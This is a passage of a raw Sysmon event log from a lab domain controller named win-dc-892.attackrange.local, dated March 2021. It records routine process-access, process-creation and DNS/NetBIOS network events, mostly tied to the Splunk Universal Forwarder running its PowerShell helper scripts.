12:01:07.283{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002888Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.283{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-6483-6064-7000-00000000AE01}3232C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002887Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.283{266CAFBE-647D-6064-2F00-00000000AE01}27963792C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6483-6064-7000-00000000AE01}3232C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002886Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.288{266CAFBE-6483-6064-7000-00000000AE01}3232C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\powershell2.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002885Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.174{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-6483-6064-6F00-00000000AE01}2768C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002884Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.174{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002883Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.174{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002882Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.174{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002881Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.174{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002880Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.174{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002879Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.174{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002878Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.174{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002877Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.174{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002876Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.174{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002875Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.174{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-6483-6064-6F00-00000000AE01}2768C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002874Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.174{266CAFBE-647D-6064-2F00-00000000AE01}27963792C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6483-6064-6F00-00000000AE01}2768C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002873Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.177{266CAFBE-6483-6064-6F00-00000000AE01}2768C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\powershell.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000002872Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.730{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-892.attackrange.local53domainfalse127.0.0.1win-dc-892.attackrange.local55208- 354300x80000000000000002871Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.730{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-892.attackrange.local53domainfalse127.0.0.1win-dc-892.attackrange.local64404- 354300x80000000000000002870Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.668{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-892.attackrange.local53domainfalse127.0.0.1win-dc-892.attackrange.local56179- 354300x80000000000000002869Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.668{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-892.attackrange.local53domainfalse127.0.0.1win-dc-892.attackrange.local54715- 354300x80000000000000002868Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.668{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-892.attackrange.local53domainfalse127.0.0.1win-dc-892.attackrange.local55056- 354300x80000000000000002867Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.668{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-892.attackrange.local53domainfalse127.0.0.1win-dc-892.attackrange.local59569- 354300x80000000000000002866Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.720{266CAFBE-6467-6064-0100-00000000AE01}4SystemNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.255-138netbios-dgmfalse10.0.1.14win-dc-892.attackrange.local138netbios-dgm 354300x80000000000000002865Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.720{266CAFBE-6467-6064-0100-00000000AE01}4SystemNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-892.attackrange.local138netbios-dgmfalse10.0.1.255-138netbios-dgm 354300x80000000000000002864Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.719{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local55208- 354300x80000000000000002863Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.717{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local64404- 354300x80000000000000002862Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.653{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local59569- 354300x80000000000000002861Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.653{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local55056- 10341000x80000000000000002860Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.065{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-6483-6064-6E00-00000000AE01}3092C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002859Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.065{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002858Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.065{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002857Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.065{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002856Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.065{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002855Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.065{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTE